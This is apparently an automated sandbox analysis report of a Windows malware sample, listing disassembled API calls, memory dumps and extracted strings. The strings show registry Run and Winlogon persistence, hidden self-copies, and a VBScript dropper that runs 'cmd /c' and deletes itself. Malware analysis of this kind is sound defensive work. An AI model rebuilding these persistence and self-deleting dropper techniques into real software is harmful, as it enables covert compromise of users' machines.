                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407E14
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407E1D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407E34
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 00407E4B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407E56
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407E63
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407E70
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407E7C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E85
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E8E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E97
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407EA0
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407EA9
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407EB7
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407EC3
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00407ECD
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407ED9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 00407EF2
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00407EFF
                                                • exit.MSVCRT ref: 00407F0B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F14
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F1D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • String ID: """, 0$")$C:\WINDOWS\system32\userinit.exe$CreateObject("WScript.Shell").Run "cmd /c ""$EXEpath$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\update.vbs$explorer.exe$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("

                                                Control-flow Graph (function at 0040A2E7)
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A301
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A318
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A325
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A332
                                                  • Part of subcall function 00411023: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 00411032
                                                  • Part of subcall function 00411023: time.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 0041104A
                                                  • Part of subcall function 00411023: srand.MSVCRT ref: 00411057
                                                  • Part of subcall function 00411023: rand.MSVCRT ref: 0041106B
                                                  • Part of subcall function 00411023: rand.MSVCRT ref: 0041107F
                                                  • Part of subcall function 00411023: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,0040A341,?), ref: 00411092
                                                  • Part of subcall function 00411023: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0040A341,?,?,?,?,?,?,?,0040A341,?), ref: 004110A2
                                                  • Part of subcall function 00411023: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040A341,?), ref: 004110AB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A344
                                                  • Part of subcall function 004080E4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00408E3E,?,?), ref: 004080F4
                                                  • Part of subcall function 004080E4: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00408E3E,?,?), ref: 0040810B
                                                  • Part of subcall function 004080E4: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00408123
                                                  • Part of subcall function 004080E4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0040812C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A35F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A371
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A38C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A39E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A3B9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A3C2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A3E3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A3F5
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A402
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A40F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A419
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A42A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A433
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A43C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A445
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A44E
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A465
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A477
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A484
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A491
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A49B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4AC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4B5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4BE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4C7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A4D0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A4E7
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A4F9
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A506
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A513
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A51D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A52E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A537
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A540
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A549
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A561
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A57D
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A584
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A590
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A5AC
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A5B3
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A5BF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A5D9
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A5E0
                                                • Sleep.KERNEL32(000001F4), ref: 0040A5F7
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413984), ref: 0040A610
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00419288,?,00419288,?), ref: 0040A644
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,?), ref: 0040A651
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,?), ref: 0040A65E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,?), ref: 0040A66B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 0040A678
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040A682
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040A699
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6A2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6AB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A765
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A771
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A77D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A789
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A792
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A79B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7A4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7AD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7B6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7C8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$?c_str@?$basic_string@V?$basic_string@$Hstd@@$??0?$basic_string@G@2@@0@V10@0@$D@2@@0@$D@1@@File$DeleteG@1@@V10@V10@@$rand$??8std@@CreateModuleNameSleepV01@V01@@Y?$basic_string@srandtime
                                                • String ID: /stext "
                                                • API String ID: 1347597097-3856184850
                                                • Opcode ID: c964c884d86e60fa01018e4e044f271ff51472a76058e80f6c38b34f422d569f
                                                • Instruction ID: 67806982f23b8319e7b07c06254346e5951a872f1c84f04e5a93173d4b33b2ec
                                                • Opcode Fuzzy Hash: c964c884d86e60fa01018e4e044f271ff51472a76058e80f6c38b34f422d569f
                                                • Instruction Fuzzy Hash: 21E1CE7280011AABCF04FFA0DD59DDE777CAF14306F1041AAF506E30A1EA789B59CB69

                                                 Control-flow Graph
                                                 • Rendered graph not reproduced here (legend: Executed / Not Executed). Function 004072E6: basic blocks 480-513, entry block 480 (4072E6-407303, wcslen), return block 495 (407707-40770B, reached from blocks 486, 510 and 511), exit() block 513 (4076EE-4076EF). External calls on the graph: wcslen, CreateDirectoryW, wcscmp, CopyFileW (two sites), SetFileAttributesW (two sites), _wgetenv, ShellExecuteW, exit; internal calls to 00408137, 00407112 and 004118F7. The per-block MSVCP60 basic_string calls are listed under APIs below.
                                                APIs
                                                • wcslen.MSVCRT ref: 004072F5
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040730C
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407313
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419BA0,00413888,?), ref: 00407326
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407333
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407343
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040734C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407371
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040737A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407382
                                                • wcscmp.MSVCRT ref: 0040738F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 004073A0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004073D8
                                                • CopyFileW.KERNEL32(00419994,00000000), ref: 004073E0
                                                • wcslen.MSVCRT ref: 004073FB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00413888,?), ref: 00407420
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00413888,?), ref: 0040742D
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 00407438
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 00407441
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 0040744A
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407466
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 0040746F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407479
                                                • CopyFileW.KERNEL32(00419994,00000000), ref: 00407481
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00419994), ref: 0040748E
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004074A0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 004074D7
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004074E4
                                                • wcslen.MSVCRT ref: 004074E9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 004074FB
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00407502
                                                • _wgetenv.MSVCRT ref: 00407512
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040751D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407528
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407533
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 00407545
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 00407553
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?,0041409C,0041417C), ref: 00407577
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,0041409C,00000000), ref: 0040758B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407596
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004075A3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004075B0
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004075BD
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004075C9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075D2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075DB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075E4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075ED
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075F6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075FF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407612
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,00419958,00000000), ref: 0040762A
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407635
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407642
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040764F
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040765B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407664
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040766D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407676
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040767F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407688
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407696
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004076A2
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004076AC
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004076B8
